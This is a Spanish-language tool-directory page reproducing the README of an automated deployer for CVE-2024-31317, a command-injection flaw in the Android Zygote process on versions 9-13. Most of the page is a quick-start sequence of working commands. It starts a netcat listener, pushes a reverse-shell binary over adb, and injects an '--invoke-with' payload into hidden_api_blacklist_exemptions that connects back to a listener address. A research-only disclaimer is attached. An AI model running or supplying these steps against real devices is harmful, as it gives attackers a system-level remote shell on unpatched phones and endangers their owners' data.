Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-31317-Deployer — Herramienta de despliegue automatizado para CVE-2024-31317, una vulnerabilidad de inyección de comandos en Android 9-13. Incluye payload de reverse shell, script de compilación y análisis técnico para investigación y educación en seguridad. | Kitploit
Herramientas/GitHubGitHub/kalibb/cve-2024-31317-deployer
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónSeguridad MóvilComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
kalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

Herramienta de despliegue automatizado para CVE-2024-31317, una vulnerabilidad de inyección de comandos en Android 9-13. Incluye payload de reverse shell, script de compilación y análisis técnico para investigación y educación en seguridad.

Ver Repositorio
12hace 7 mesesAún no revisado

CVE-2024-31317 Deployer

License Android Status

🔒 Declaración de seguridad

Este proyecto es únicamente para fines de investigación y educación en seguridad. El uso de esta herramienta para realizar pruebas no autorizadas es ilegal. El autor no se hace responsable de ningún mal uso o daño.

📋 Resumen

CVE-2024-31317 es una vulnerabilidad de seguridad crítica que afecta a dispositivos Android 9 a Android 13, permitiendo que aplicaciones con permiso WRITE_SECURE_SETTINGS obtengan ejecución a nivel de sistema mediante inyección de comandos.

Este proyecto proporciona un análisis técnico detallado de la vulnerabilidad, código de prueba de concepto y herramientas de despliegue automatizadas.

✨ Características principales

  • 📱 Soporte para Android 9-13 en todas las versiones
  • 🛠️ Script de despliegue automatizado
  • 🔄 Conexión de shell inversa
  • 📊 Documentación técnica detallada
  • 🎯 Diseño modular

🐛 Detalles de la vulnerabilidad

  • CVE ID: CVE-2024-31317
  • Tipo de vulnerabilidad: Inyección de comandos
  • Nivel de gravedad: Alto (High)
  • Puntuación CVSS: 7.8
  • Componente afectado: Proceso Zygote de Android
  • Estado de la corrección: Corregido en el parche de seguridad de Android de junio de 2024

🎯 Alcance del impacto

Versiones afectadas

  • ✅ Android 9-13

Versiones no afectadas

  • ❌ Android 14+ (corregido)
  • ❌ Dispositivos con el parche de seguridad de junio de 2024 o posterior instalado

📁 Estructura del proyecto

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Inicio rápido

1. Clonar el proyecto

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compilar el payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Desplegar

root@kitploit:~
# Iniciar el listener
nc -lvnp 4444

# Enviar y ejecutar
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# Inyectar payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# Activar la vulnerabilidad
adb shell stop && adb shell start

📚 Documentación

  • Análisis técnico profundo
  • Instrucciones de uso del payload
  • Guía completa de uso

⚠️ Descargo de responsabilidad

Este proyecto es únicamente para fines de investigación y educación en seguridad. Al usar esta herramienta usted acepta:

  • Cumplir con todas las leyes y regulaciones aplicables
  • Usarla solo para investigaciones de seguridad legítimas
  • Asumir toda la responsabilidad por sus acciones

📜 Licencia

Este proyecto está bajo la licencia MIT - consulte el archivo LICENSE para más detalles

👨‍💻 Autor

fcy10012 - GitHub

🙏 Agradecimientos

Proyecto de referencia: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ ¡Si este proyecto le resulta útil, por favor dele una estrella!

Descargar herramienta